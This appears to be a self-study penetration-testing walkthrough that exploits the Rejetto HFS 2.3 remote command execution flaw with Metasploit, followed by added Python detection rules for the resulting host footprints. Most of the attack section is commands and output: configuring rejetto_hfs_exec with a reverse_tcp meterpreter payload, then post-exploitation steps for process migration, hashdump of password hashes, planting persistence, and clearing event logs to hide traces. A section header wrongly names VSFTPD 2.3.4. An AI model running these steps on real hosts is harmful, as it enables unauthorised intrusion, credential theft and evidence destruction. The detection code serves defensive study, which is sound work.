Preface
Penetration testing and privilege escalation against the HFS 2.3 vulnerability (HFS: HttpFileServer)
I. Using the database in Metasploit
Startup steps
root@kali:~# service postgresql start
root@kali:~# msfdb init
msfdb init initializes the database
- Start Metasploit with msfconsole
- Enter db_status to check the database connection status; the output below shows a successful connection
msf6 > db_status
[*] Connected to msf. Connection type: postgresql.
msf6 > Interrupt: use the 'exit' command to quit
msf6 >
Scan with nmap from within msf to discover the HFS vulnerability
II. VSFTPD 2.3.4 exploitation
1. Threat modeling
Select the exploit module with use, then list its parameters with options
msf6 > search hfs
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/multi/http/git_client_command_exec 2014-12-18 excellent No Malicious Git and Mercurial HTTP Server For CVE-2014-9390
1 exploit/windows/http/rejetto_hfs_exec 2014-09-11 excellent Yes Rejetto HttpFileServer Remote Command Execution
Interact with a module by name or index. For example info 1, use 1 or use exploit/windows/http/rejetto_hfs_exec
msf6 > use 1
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/http/rejetto_hfs_exec) > options
Module options (exploit/windows/http/rejetto_hfs_exec):
Name Current Setting Required Description
---- --------------- -------- -----------
HTTPDELAY 10 no Seconds to wait before terminating web server
Proxies no A proxy chain of format type:host:port[,type:host:port]
[...]
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 80 yes The target port (TCP)
SRVHOST 0.0.0.0 yes The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
SRVPORT 8080 yes The local port to listen on.
SSL false no Negotiate SSL/TLS for outgoing connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
TARGETURI / yes The path of the web application
URIPATH no The URI to use for this exploit (default is random)
VHOST no HTTP server virtual host
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 192.168.1.113 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic
msf6 exploit(windows/http/rejetto_hfs_exec) > set rhosts 192.168.1.105
rhosts => 192.168.1.105
msf6 exploit(windows/http/rejetto_hfs_exec) > set rport 8080
rport => 8080
2. Attack
Run exploit to launch the attack. Although the attack succeeded, no session was displayed; I tried many times and could not find the reason.
msf6 exploit(windows/http/rejetto_hfs_exec) > exploit
[*] Started reverse TCP handler on 192.168.1.113:4444
[*] Using URL: http://0.0.0.0:8080/CeeoHsoKnTH0oyJ
[*] Local IP: http://192.168.1.113:8080/CeeoHsoKnTH0oyJ
[*] Server started.
[*] Sending a malicious request to /
/usr/share/metasploit-framework/modules/exploits/windows/http/rejetto_hfs_exec.rb:110: warning: URI.escape is obsolete
/usr/share/metasploit-framework/modules/exploits/windows/http/rejetto_hfs_exec.rb:110: warning: URI.escape is obsolete
[*] Server stopped.
[!] This exploit may require manual cleanup of '%TEMP%\ciBBfVI.vbs' on the target
[*] Exploit completed, but no session was created.
msf6 exploit(windows/http/rejetto_hfs_exec) >
3. Post-exploitation persistence
Change the process that Metasploit resides in
meterpreter > getpid #show the current process ID
meterpreter > ps #list processes
meterpreter > migrate 1864 #migrate into another process, here explorer.exe
meterpreter > hashdump #dump the system password hashes
For persistent control, use the persistence module, which uploads a malicious file to the compromised target host
meterpreter > run persistence
Set up a handler to connect to the controlled host
msf6 > use exploit/multi/handler
Modify the parameters with set, then run exploit and wait for the controlled host to start up
4. Clearing traces of the penetration
meterpreter > run event_manager -i #view the event logs
meterpreter > run event_manager -c #clear the event logs
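Seen from the defending side, this walkthrough leaves two host footprints worth alerting on: in section 2 the HFS server process ends up spawning a shell that runs a .vbs dropped in %TEMP%, and in section 4 the event logs are cleared (Windows records the clearing itself as Security event 1102 or System event 104, after the wipe). The Python below is an added example, not code from the original post or from Metasploit; it runs those detection rules over constructed process-creation and log-clear events in a simplified Sysmon event 1 / Security 4688 shape, and assumes hfs.exe as the server's image name.

```python
import ntpath
import re

# Constructed sample events (not real logs) in a simplified Sysmon event 1 /
# Security 4688 shape. The .vbs name is the one from the exploit output above;
# hfs.exe as the HFS server's image name is an assumption.
SAMPLE_EVENTS = [
    {"EventID": 1, "ParentImage": r"C:\hfs\hfs.exe",
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"cmd.exe /c cscript //nologo C:\Users\u\AppData\Local\Temp\ciBBfVI.vbs"},
    {"EventID": 1, "ParentImage": r"C:\Windows\System32\cmd.exe",
     "Image": r"C:\Windows\System32\cscript.exe",
     "CommandLine": r"cscript //nologo C:\Users\u\AppData\Local\Temp\ciBBfVI.vbs"},
    {"EventID": 1, "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\notepad.exe",
     "CommandLine": r"notepad.exe C:\Users\u\notes.txt"},
    {"EventID": 1102, "Channel": "Security"},  # "The audit log was cleared"
]

SERVER_IMAGE = "hfs.exe"  # assumed image name of the HFS server process
SHELLS = {"cmd.exe", "powershell.exe", "cscript.exe", "wscript.exe"}
SCRIPT_HOST = re.compile(r"\b[cw]script(\.exe)?\b", re.IGNORECASE)
TEMP_VBS = re.compile(r"\\temp\\\S+\.vbs\b", re.IGNORECASE)  # .vbs under a Temp dir

def _base(path):
    return ntpath.basename(path or "").lower()  # file name part of a Windows path

def classify(event):
    """Return the names of the rules this event trips (empty list if benign)."""
    hits = []
    eid = event.get("EventID")
    if eid in (1102, 104):  # Security / System event log cleared
        hits.append("event_log_cleared")
    if eid in (1, 4688):  # process creation: Sysmon 1 or Security 4688 field names
        parent = _base(event.get("ParentImage") or event.get("ParentProcessName"))
        image = _base(event.get("Image") or event.get("NewProcessName"))
        cmd = event.get("CommandLine", "")
        if parent == SERVER_IMAGE and image in SHELLS:
            hits.append("webserver_spawned_shell")
        if SCRIPT_HOST.search(cmd) and TEMP_VBS.search(cmd):
            hits.append("script_host_temp_vbs")
    return hits

def scan(events):
    """Map event index -> tripped rules, keeping only events that trip at least one."""
    return {i: r for i, e in enumerate(events) if (r := classify(e))}
```

Running scan(SAMPLE_EVENTS) flags events 0, 1 and 3 and leaves the notepad launch alone; the log-clear rule is the one that still fires after event_manager -c, because the clearing event is written after the log is emptied.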
Summary
This article briefly introduced exploitation and privilege escalation for the HFS 2.3 backdoor vulnerability. I am still learning myself; this is for reference only and serves as my study notes, and discussion is welcome.